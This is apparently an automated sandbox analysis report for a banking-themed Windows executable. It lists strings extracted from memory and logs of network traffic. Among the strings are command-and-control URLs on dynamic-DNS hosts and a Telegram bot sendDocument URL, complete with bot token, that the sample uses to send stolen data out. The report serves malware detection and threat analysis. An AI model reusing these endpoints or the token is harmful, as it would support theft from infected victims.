HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 10:42:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4221944862.0000000006590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6ed5f34854f0f
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215176460.0000000001295000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ba054f6b56195
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4221944862.0000000006590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.0000000002846000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: denizbank 25.11.2024 E80 aspc.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802050663.00000000058B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-455
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49993 version: TLS 1.2
